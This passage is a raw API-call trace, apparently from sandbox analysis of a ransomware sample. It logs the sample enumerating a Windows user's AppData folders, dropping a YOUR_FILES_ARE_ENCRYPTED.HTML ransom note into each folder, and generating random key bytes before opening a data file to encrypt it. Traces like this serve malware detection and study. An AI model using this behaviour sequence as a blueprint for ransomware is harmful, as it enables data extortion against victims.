ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b04390b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b04390b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="..", cAlternateFileName="")) returned 0 [0120.094] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0120.094] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0120.094] GetProcessHeap () returned 0x600000 [0120.094] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.094] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.095] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.096] CloseHandle (hObject=0x31c) returned 1 [0120.096] GetProcessHeap () returned 0x600000 [0120.096] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.096] GetProcessHeap () returned 0x600000 [0120.096] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.096] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b01d4e5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b01d4e5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b01d4e5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0120.096] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.096] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache") returned 97 [0120.097] GetProcessHeap () returned 0x600000 [0120.097] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.098] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache" [0120.098] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache\\*" [0120.098] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b01d4e5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b01d4e5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b01d4e5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.098] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b01d4e5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b01d4e5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b01d4e5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="..", cAlternateFileName="")) returned 1 [0120.098] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b01d4e5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b01d4e5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b01d4e5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="..", cAlternateFileName="")) returned 0 [0120.099] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.099] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0120.099] GetProcessHeap () returned 0x600000 [0120.099] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.101] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.102] CloseHandle (hObject=0x31c) returned 1 [0120.102] GetProcessHeap () returned 0x600000 [0120.102] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.102] GetProcessHeap () returned 0x600000 [0120.102] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.102] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1aff73be, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1aff73be, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1aff73be, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0120.102] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.102] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState") returned 97 [0120.102] GetProcessHeap () returned 0x600000 [0120.102] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.102] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState" [0120.102] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState\\*" [0120.103] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1aff73be, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1aff73be, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1aff73be, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName=".", cAlternateFileName="")) returned 0x626778 [0120.103] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1aff73be, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1aff73be, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1aff73be, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="..", cAlternateFileName="")) returned 1 [0120.103] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1aff73be, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1aff73be, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1aff73be, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="..", cAlternateFileName="")) returned 0 [0120.103] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0120.103] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0120.103] GetProcessHeap () returned 0x600000 [0120.103] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.103] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.104] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.105] CloseHandle (hObject=0x31c) returned 1 [0120.105] GetProcessHeap () returned 0x600000 [0120.105] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.105] GetProcessHeap () returned 0x600000 [0120.105] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.105] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b364b39, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b364b39, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b364b39, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0120.105] StrStrIW (lpFirst="Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.105] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe") returned 144 [0120.105] GetProcessHeap () returned 0x600000 [0120.106] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.106] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe" [0120.106] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\*" [0120.106] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b364b39, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b364b39, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b364b39, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName=".", cAlternateFileName="")) returned 0x626978 [0120.106] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b364b39, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b364b39, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b364b39, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="..", cAlternateFileName="")) returned 1 [0120.106] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b364b39, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b364b39, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b3b0f8a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0120.106] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.106] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\ActivationStore") returned 160 [0120.106] GetProcessHeap () returned 0x600000 [0120.106] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.108] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\ActivationStore" [0120.108] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\ActivationStore\\*" [0120.108] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b364b39, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b364b39, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b3b0f8a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6dace0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0120.110] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b364b39, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b364b39, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b3b0f8a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6dace0, cFileName="..", cAlternateFileName="")) returned 1 [0120.110] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b38ac85, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b46f8ed, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b46f8ed, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x6b4210, dwReserved1=0x6dace0, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0120.110] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.110] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 180 [0120.110] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0120.110] lstrlenW (lpString=".dat") returned 4 [0120.110] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0120.110] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0120.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\microsoft.windowscamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0120.112] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=32768) returned 1 [0120.112] GetProcessHeap () returned 0x600000 [0120.112] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0120.115] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="2F") returned 2 [0120.115] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="ED") returned 2 [0120.115] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="19") returned 2 [0120.115] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="E8") returned 2 [0120.115] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="1A") returned 2 [0120.116] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="3D") returned 2 [0120.116] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="10") returned 2 [0120.116] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="7C") returned 2 [0120.116] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="BD") returned 2 [0120.116] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="CE") returned 2 [0120.116] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="6F") returned 2 [0120.116] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="70") returned 2 [0120.116] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="B1") returned 2 [0120.116] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="2D") returned 2 [0120.116] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="C6") returned 2 [0120.116] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="3F") returned 2 [0120.116] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="6F") returned 2 [0120.116] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="E3") returned 2 [0120.116] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="5C") returned 2 [0120.116] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="28") returned 2 [0120.116] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="70") returned 2 [0120.116] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="E9") returned 2 [0120.116] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="83") returned 2 [0120.116] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="7B") returned 2 [0120.116] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="26") returned 2 [0120.116] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="B2") returned 2 [0120.116] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="18") returned 2 [0120.116] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="3F") returned 2 [0120.116] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="01") returned 2 [0120.116] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="BE") returned 2 [0120.116] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="32") returned 2 [0120.116] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="1E") returned 2 [0120.117] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Microsoft.WindowsCamera_2015.1071.40.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") 